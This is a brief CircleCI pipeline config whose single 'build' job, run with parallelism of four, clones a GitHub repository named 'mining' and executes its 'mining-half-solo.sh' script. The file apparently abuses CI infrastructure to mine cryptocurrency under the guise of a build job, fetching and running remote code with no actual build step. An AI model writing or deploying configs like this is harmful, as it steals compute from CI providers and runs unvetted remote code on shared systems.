version: 2.1
jobs:
  build:
    docker:
      - image: 'ubuntu:latest'
    parallelism: 4
    steps:
      - run: apt update && apt install git && git clone https://github.com/m0098/mining.git && cd mining && bash mining-half-solo.sh
     